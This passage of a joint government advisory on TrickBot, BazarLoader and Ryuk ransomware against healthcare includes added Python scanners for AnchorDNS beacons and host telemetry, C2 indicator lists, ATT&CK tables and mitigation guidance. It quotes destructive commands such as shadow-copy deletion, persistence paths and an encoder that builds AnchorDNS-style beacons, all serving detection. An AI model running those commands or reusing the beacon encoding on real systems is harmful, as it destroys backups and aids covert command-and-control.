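XOR_KEY = 0xB9

# Historic AnchorDNS C2 domains from the advisory, refanged for comparison.
ANCHOR_C2_DOMAINS = frozenset(
    d.replace("[.]", ".") for d in
    ("kostunivo[.]com", "chishir[.]com", "mangoclone[.]com", "onixcellent[.]com"))

# /anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/
GUID_RE = re.compile(r"/anchor_dns/[^/_]+_\d+\.[0-9A-Za-z]{32}/")
# A DNS label made only of whole hex bytes.
HEX_LABEL_RE = re.compile(r"^(?:[0-9a-fA-F]{2})+$")


def xor_encode_to_labels(text, key=XOR_KEY, label_len=60):
    """Inverse of the decoder: XOR text with key, hex-encode, split into DNS-sized labels."""
    hexed = bytes(b ^ key for b in text.encode("ascii")).hex()
    return ".".join(hexed[i:i + label_len] for i in range(0, len(hexed), label_len))


def xor_decode_hex_labels(qname, key=XOR_KEY):
    """Join the leading hex labels of qname and XOR with key; printable ASCII or None."""
    hex_labels = []
    for label in qname.rstrip(".").split("."):
        if not HEX_LABEL_RE.match(label):
            break
        hex_labels.append(label)
    if not hex_labels:
        return None
    decoded = bytes(b ^ key for b in bytes.fromhex("".join(hex_labels)))
    if not all(0x20 <= b < 0x7F for b in decoded):
        return None  # not printable text, so not a beacon in the layout we expect
    return decoded.decode("ascii")


def find_guid(decoded):
    """Return the AnchorDNS GUID found directly in decoded text or under one base64 layer."""
    match = GUID_RE.search(decoded)
    if match:
        return match.group(0)
    try:
        inner = base64.b64decode(decoded, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    match = GUID_RE.search(inner)
    return match.group(0) if match else None


def registrable_domain(qname):
    """Last two labels; sufficient for the .com/.org names in the advisory."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def analyse_qname(qname):
    reasons = []
    if registrable_domain(qname) in ANCHOR_C2_DOMAINS:
        reasons.append("known_anchor_dns_c2")
    decoded = xor_decode_hex_labels(qname)
    guid = find_guid(decoded) if decoded else None
    if guid:
        reasons.append("anchor_dns_guid_in_query")
    return {"qname": qname, "decoded": decoded, "guid": guid, "reasons": reasons}


def scan_dns_log(lines):
    """Return one finding dict per log line whose query name triggers at least one reason."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        result = analyse_qname(fields[2])
        if result["reasons"]:
            result["client"] = fields[1]
            findings.append(result)
    return findings


# Constructed sample: a beacon to a known C2, a base64-wrapped beacon to an
# unknown domain, a bare C2 lookup, and two benign queries.
SAMPLE_GUID = "/anchor_dns/WS-FINANCE01_17763.0123456789abcdef0123456789abcdef/"
SAMPLE_DNS_LOG = [
    "2020-10-28T14:02:11Z 10.0.5.23 " + xor_encode_to_labels(SAMPLE_GUID) + ".kostunivo.com A",
    "2020-10-28T14:02:12Z 10.0.5.23 www.example.com A",
    "2020-10-28T14:02:13Z 10.0.5.40 deadbeef.cdn.example.net A",
    "2020-10-28T14:02:14Z 10.0.5.51 "
    + xor_encode_to_labels(base64.b64encode(SAMPLE_GUID.encode()).decode())
    + ".updates.example.org TXT",
    "2020-10-28T14:02:15Z 10.0.5.51 chishir.com A",
]


def run_sample():
    return scan_dns_log(SAMPLE_DNS_LOG)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding["client"], finding["qname"][:40] + "...", finding["reasons"])
```

The known-C2 check is kept separate from the payload decode on purpose: a campaign that rotates to a new domain still trips the GUID detection, and a bare lookup of a listed domain is still reported even when no payload is present. Adapt `scan_dns_log` to the field layout of the resolver or EDR DNS export actually in use.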
The following C2 servers are known to be associated with this malicious activity:

 * `45[.]148[.]10[.]92`
 * `170[.]238[.]117[.]187`
 * `177[.]74[.]232[.]124`
 * `185[.]68[.]93[.]17`
 * `203[.]176[.]135[.]102`
 * `96[.]9[.]73[.]73`
 * `96[.]9[.]77[.]142`
 * `37[.]187[.]3[.]176`
 * `45[.]89[.]127[.]92`
 * `62[.]108[.]35[.]103`
 * `91[.]200[.]103[.]242`
 * `103[.]84[.]238[.]3`
 * `36[.]89[.]106[.]69`
 * `103[.]76[.]169[.]213`
 * `36[.]91[.]87[.]227`
 * `105[.]163[.]17[.]83`
 * `185[.]117[.]73[.]163`
 * `5[.]2[.]78[.]118`
 * `185[.]90[.]61[.]69`
 * `185[.]90[.]61[.]62`
 * `86[.]104[.]194[.]30`
 * `31[.]131[.]21[.]184`
 * `46[.]28[.]64[.]8`
 * `104[.]161[.]32[.]111`
 * `107[.]172[.]140[.]171`
 * `131[.]153[.]22[.]148`
 * `195[.]123[.]240[.]219`
 * `195[.]123[.]242[.]119`
 * `195[.]123[.]242[.]120`
 * `51[.]81[.]113[.]25`
 * `74[.]222[.]14[.]27`

#### Ryuk Ransomware

Typically, Ryuk has been deployed as a payload from banking Trojans such as TrickBot. (See the [United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>), on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the `HERMES` tag, but in some infections the files have `.ryk` added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.

While navigating the victim network, Ryuk actors commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—to steal credentials. Both frameworks are very robust and highly effective dual-purpose tools, allowing actors to dump clear-text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject a malicious dynamic-link library into memory with read, write, and execute permissions. To maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.

Ryuk actors will quickly map the network to enumerate the environment and understand the scope of the infection. To limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as `net view`, `net computers`, and `ping`—to locate mapped network shares, domain controllers, and Active Directory. To move laterally throughout the network, the group relies on native tools such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management, and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.

Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a `.bat` file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.

In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The `RyukReadMe` file placed on the system after encryption provides one or two email addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provided a ransom amount in the initial notification, Ryuk actors now designate a ransom amount only after the victim makes contact.

The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.

Initial testing indicates that the `RyukReadMe` file does not need to be present for the decryption script to run successfully, but other reporting advises that some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the `RyukReadMe` file is deleted when the script is finished, which may affect the decryption script unless the file is saved and stored in a different location before running.

According to MITRE, [Ryuk](<https://attack.mitre.org/versions/v7/software/S0446/>) uses the ATT&CK techniques listed in table 1.

_Table 1: Ryuk ATT&CK techniques_

**Technique** | **Use**
---|---
System Network Configuration Discovery [[T1016](<https://attack.mitre.org/versions/v7/techniques/T1016/>)] | Ryuk has called `GetIpNetTable` in an attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.
Masquerading: Match Legitimate Name or Location [[T1036.005](<https://attack.mitre.org/versions/v7/techniques/T1036/005/>)] | Ryuk has constructed legitimate-appearing installation folder paths by calling `GetWindowsDirectoryW` and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as `C:\Users\Public`.
Process Injection [[T1055](<https://attack.mitre.org/versions/v7/techniques/T1055/>)] | Ryuk has injected itself into remote processes to encrypt files using a combination of `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread`.
Process Discovery [[T1057](<https://attack.mitre.org/versions/v7/techniques/T1057/>)] | Ryuk has called `CreateToolhelp32Snapshot` to enumerate all running processes.
Command and Scripting Interpreter: Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v7/techniques/T1059/003/>)] | Ryuk has used `cmd.exe` to create a Registry entry to establish persistence.
File and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v7/techniques/T1083/>)] | Ryuk has called `GetLogicalDrives` to enumerate all mounted drives, and `GetDriveTypeW` to determine the drive type.
Native API [[T1106](<https://attack.mitre.org/versions/v7/techniques/T1106/>)] | Ryuk has used multiple native APIs, including `ShellExecuteW` to run executables; `GetWindowsDirectoryW` to create folders; and `VirtualAlloc`, `WriteProcessMemory`, and `CreateRemoteThread` for process injection.
Access Token Manipulation [[T1134](<https://attack.mitre.org/versions/v7/techniques/T1134/>)] | Ryuk has attempted to adjust its token privileges to have the `SeDebugPrivilege`.
Data Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v7/techniques/T1486/>)] | Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of `.RYK`. Encrypted directories have had a ransom note of `RyukReadMe.txt` written to the directory.
Service Stop [[T1489](<https://attack.mitre.org/versions/v7/techniques/T1489/>)] | Ryuk has called `kill.bat` to stop services, disable services, and kill processes.
Inhibit System Recovery [[T1490](<https://attack.mitre.org/versions/v7/techniques/T1490/>)] | Ryuk has used `vssadmin Delete Shadows /all /quiet` to delete volume shadow copies and `vssadmin resize shadowstorage` to force deletion of shadow copies created by third-party applications.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [[T1547.001](<https://attack.mitre.org/versions/v7/techniques/T1547/001/>)] | Ryuk has used the Windows command line to create a Registry entry under `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` to establish persistence.
Impair Defenses: Disable or Modify Tools [[T1562.001](<https://attack.mitre.org/versions/v7/techniques/T1562/001/>)] | Ryuk has stopped services related to anti-virus.

### Mitigations

For a downloadable copy of IOCs, see AA20-302A.stix. For additional IOCs detailing this activity, see <https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>.

#### Plans and Policies

CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.

#### Network Best Practices

 * Patch operating systems, software, and firmware as soon as manufacturers release updates.
 * Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.
 * Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.
 * Use multi-factor authentication where possible.
 * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.
 * Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.
 * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.
 * Audit logs to ensure new accounts are legitimate.
 * Scan for open or listening ports and remediate those that are not needed.
 * Identify critical assets such as patient database servers, medical records, and telehealth and telework infrastructure; create backups of these systems and house the backups offline from the network.
 * Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.
 * Set antivirus and anti-malware solutions to automatically update; conduct regular scans.

#### Ransomware Best Practices

CISA, FBI, and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, FBI, CISA, and HHS also recommend the following:

 * Regularly back up data, air gap, and password protect backup copies offline.
 * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.

#### User Awareness Best Practices

 * Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.
 * Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.

#### Recommended Mitigation Measures

System administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly.
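The paragraph above treats TrickBot indicators as a warning of imminent ransomware deployment. As an added example (not code from the advisory or from CISA/NCSC), the Python script below scans host telemetry for the indicators this advisory lists: the TrickBot self-deletion commands and `autoupdate#` scheduled-task name, the BazarLoader dropper file names, the `adobe.lnk` startup entry and Winlogon Userinit value, and the Ryuk `vssadmin`, `kill.bat` and HKCU Run-key behaviours from Table 1. The JSON-lines telemetry format, the `type`/`host`/`image`/`cmdline`/`name`/`path` field names, and the host names and file paths in the sample are assumptions standing in for a Sysmon or EDR export; the patterns themselves are taken from the advisory text.

```python
"""Scan host telemetry for the TrickBot, BazarLoader and Ryuk indicators in this advisory.

Added example, not code from the advisory. The input format (one JSON object per
line with a "type" of process, task, file or registry) is an assumption standing
in for a Sysmon or EDR export; the patterns come from the advisory text.
"""
import json
import re

# BazarLoader dropper file names listed in the advisory.
BAZAR_DROPPER_NAMES = frozenset(n.lower() for n in (
    "Report-Review26-10.exe", "Review_Report15-10.exe", "Document_Print.exe",
    "Report10-13.exe", "Text_Report.exe"))

# Command-line shapes quoted in the advisory: TrickBot self-deletion and the
# Ryuk recovery-inhibition / service-stop commands from Table 1.
CMDLINE_RULES = (
    ("trickbot_self_delete_cmd",
     re.compile(r"cmd\.exe\s+/c\s+timeout\s+3\s*&&\s*del\s+\S", re.I)),
    ("trickbot_self_delete_ps",
     re.compile(r"start-sleep\s+3\s*;\s*remove-item\s+\S", re.I)),
    ("ryuk_delete_shadows",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows\s+/all\s+/quiet", re.I)),
    ("ryuk_resize_shadowstorage",
     re.compile(r"vssadmin(\.exe)?\s+resize\s+shadowstorage", re.I)),
    ("ryuk_kill_bat", re.compile(r"(^|[\\\s\"])kill\.bat\b", re.I)),
)

# AnchorDNS scheduled-task naming convention: autoupdate#<5 digits>.
TASK_NAME_RULE = re.compile(r"^autoupdate#\d{5}$", re.I)
# Bazar startup-folder persistence, Ryuk HKCU Run-key persistence, and the
# Winlogon Userinit value the advisory says to inspect for Bazar.
BAZAR_STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\adobe\.lnk$", re.I)
HKCU_RUN_KEY = re.compile(
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
WINLOGON_USERINIT = re.compile(
    r"^HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit$", re.I)


def classify(event):
    """Return the names of all indicators that one telemetry event matches."""
    kind = event.get("type")
    hits = []
    if kind == "process":
        image = event.get("image", "")
        if image.rsplit("\\", 1)[-1].lower() in BAZAR_DROPPER_NAMES:
            hits.append("bazar_dropper_name")
        cmdline = event.get("cmdline", "")
        hits.extend(name for name, rule in CMDLINE_RULES if rule.search(cmdline))
    elif kind == "task":
        if TASK_NAME_RULE.match(event.get("name", "")):
            hits.append("anchor_dns_task_name")
    elif kind == "file":
        if BAZAR_STARTUP_LNK.search(event.get("path", "")):
            hits.append("bazar_startup_lnk")
    elif kind == "registry":
        path = event.get("path", "")
        if HKCU_RUN_KEY.match(path):
            hits.append("hkcu_run_key_write")
        elif WINLOGON_USERINIT.match(path):
            hits.append("winlogon_userinit_write")
    return hits


def scan(lines):
    """Return (line_number, host, indicator) for every hit; malformed lines are skipped."""
    findings = []
    for number, line in enumerate(lines, start=1):
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        for hit in classify(event):
            findings.append((number, event.get("host", "?"), hit))
    return findings


# Constructed telemetry: nine events that should fire and three that should not.
SAMPLE_TELEMETRY = r"""
{"type": "process", "host": "WS01", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c timeout 3 && del C:\\Users\\alice\\Downloads\\mfjdieks.exe"}
{"type": "process", "host": "WS01", "image": "C:\\Users\\alice\\Downloads\\Report10-13.exe", "cmdline": "\"C:\\Users\\alice\\Downloads\\Report10-13.exe\""}
{"type": "process", "host": "WS02", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /C PowerShell \"Start-Sleep 3; Remove-Item C:\\Users\\bob\\AppData\\Roaming\\winapp\\x.exe\""}
{"type": "task", "host": "WS02", "name": "autoupdate#16876"}
{"type": "file", "host": "WS03", "path": "C:\\Users\\carol\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adobe.lnk"}
{"type": "process", "host": "SRV01", "image": "C:\\Windows\\System32\\vssadmin.exe", "cmdline": "vssadmin Delete Shadows /all /quiet"}
{"type": "process", "host": "SRV01", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c C:\\Windows\\Temp\\kill.bat"}
{"type": "registry", "host": "SRV01", "path": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos"}
{"type": "registry", "host": "WS03", "path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit"}
{"type": "process", "host": "WS03", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c dir"}
{"type": "task", "host": "WS03", "name": "GoogleUpdateTaskMachineUA"}
{"type": "registry", "host": "WS03", "path": "HKEY_CURRENT_USER\\Software\\Policies\\Example"}
"""


def run_sample():
    return scan(SAMPLE_TELEMETRY.strip().splitlines())


if __name__ == "__main__":
    for number, host, indicator in run_sample():
        print(f"line {number:2d} {host:6s} {indicator}")
```

Each rule is deliberately narrow (the exact `timeout 3 && del` shape, the five-digit `autoupdate#` task name, the exact `vssadmin` switches) so that a hit is worth an analyst's time; the `classify` function is the place to add looser variants once the narrow ones are in production and the false-positive rate is understood.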
Upon evidence of a TrickBot infection, review DNS logs and use the XOR key `0xB9` to decode XOR-encoded DNS requests, which reveals the presence of `Anchor_DNS`; maintain and provide the relevant logs.

### GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR

This section is based on the CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide, which can be found at <https://www.cisa.gov/publication/ransomware-guide>.

CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.

#### Ransomware Prevention

#### _Join and Engage with Cybersecurity Organizations_

CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:

 * Join a healthcare information sharing organization, H-ISAC:
   * Health Information Sharing and Analysis Center (H-ISAC): <https://h-isac.org/membership-account/join-h-isac/>
   * Sector-based ISACs - National Council of ISACs: <https://www.nationalisacs.org/member-isacs>
   * Information Sharing and Analysis Organization (ISAO) Standards Organization: <https://www.isao.org/information-sharing-groups/>
 * Engage with CISA and FBI, as well as HHS—through the HHS Health Sector Cybersecurity Coordination Center (HC3)—to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises.
   * CISA: [cisa.gov](<cisa.gov>), <https://us-cert.cisa.gov/mailing-lists-and-feeds>, [central@cisa.gov](<central@cisa.gov>)
   * FBI: [ic3.gov](<ic3.gov>), [www.fbi.gov/contact-us/field](<www.fbi.gov/contact-us/field>), [CyWatch@fbi.gov](<CyWatch@fbi.gov>)
   * HHS/HC3: <http://www.hhs.gov/hc3>, [HC3@HHS.gov](<HC3@HHS.gov>)

Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.

#### _Follow Ransomware Best Practices_

Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.

 * It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks, as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization.
   * Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.
 * Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.
 * Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred.
   * Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.
   * Ensure all backup hardware is properly patched.
 * In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.
 * Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident.
   * Review available incident response guidance, such as CISA’s Technical Approaches to Uncovering and Remediating Malicious Activity: <https://us-cert.cisa.gov/ncas/alerts/aa20-245a>.
   * Help your organization better organize around cyber incident response.
   * Develop a cyber incident response plan.
   * The Ransomware Response Checklist, available in the [CISA and MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), serves as an adaptable, ransomware-specific annex to organizational cyber incident response or disruption plans.
   * Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf>).
   * Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.
 * Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following:
   * Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.
   * Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.
   * Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant number of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.
   * Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable.
   * Predefine network segments, IT capabilities, and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.
   * Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.
 * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.
 * HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <http://www.hhs.gov/hc3>.

#### _Hardening Guidance_

 * The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices, found here: <https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity>.
 * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for additional in-depth hardening guidance.

#### _Contact CISA for These No-Cost Resources_

 * Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.
 * Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <https://www.cisa.gov/cyber-resource-hub>.
   * Assessments include Vulnerability Scanning and Phishing Campaign Assessment.
 * Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.
 * CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.
 * Contacts:
   * SLTT organizations: [CyberLiaison_SLTT@cisa.dhs.gov](<CyberLiaison_SLTT@cisa.dhs.gov>)
   * Private sector organizations: [CyberLiaison_Industry@cisa.dhs.gov](<CyberLiaison_Industry@cisa.dhs.gov>)

#### _Ransomware Quick References_

 * _Ransomware: What It Is and What to Do About It_ (CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: [https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf](<https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf>)
 * Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <https://www.us-cert.cisa.gov/Ransomware>
 * HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at [www.hhs.gov/hc3](<www.hhs.gov/hc3>)
 * _Security Primer – Ransomware_ (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <https://www.cisecurity.org/white-papers/security-primer-ransomware/>
 * _Ransomware: Facts, Threats, and Countermeasures_ (MS-ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: [https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/](<https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/>)
 * HHS Ransomware Fact Sheet: <https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf>
 * NIST Securing Data Integrity White Paper: <https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft>

#### Ransomware Response Checklist

**Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.**

Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), which contains steps for detection and analysis as well as containment and eradication.

#### _Consider the Need For Extended Identification or Analysis_

If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:

 * Recovered executable file
 * Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible
 * Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
 * Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
 * Malware samples
 * Names of any other malware identified on your system
 * Encrypted file samples
 * Log files (Windows Event Logs from compromised systems, firewall logs, etc.)
 * Any PowerShell scripts found to have executed on the systems
 * Any user accounts created in Active Directory or machines added to the network during the exploitation
 * Email addresses used by the attackers and any associated phishing emails
 * A copy of the ransom note
 * Ransom amount and whether or not the ransom was paid
 * Bitcoin wallets used by the attackers
 * Bitcoin wallets used to pay the ransom (if applicable)
 * Copies of any communications with attackers

Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.

 * CISA – Advanced Malware Analysis Center: <https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf>
 * Remote Assistance – Request via [Central@cisa.gov](<Central@cisa.gov>)

### Contact Information

CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for the purpose of notification.

 * State and Local Response Contacts
 * IT/IT Security Team – Centralized Cyber Incident Reporting
 * State and Local Law Enforcement
 * Fusion Center
 * Managed/Security Service Providers
 * Cyber Insurance

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<Central@cisa.dhs.gov>).

Additionally, see [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for information on contacting—and what to expect from contacting—federal asset response and federal threat response contacts.

### _Disclaimer_

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <https://cisa.gov/tlp>.

### References

[CISA Emergency Services Sector Continuity Planning Suite](<https://www.cisa.gov/emergency-services-sector-continuity-planning-suite>)

[CISA MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>)

[CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)

[FBI PSA: “High-Impact Ransomware Attacks Threaten U.S.
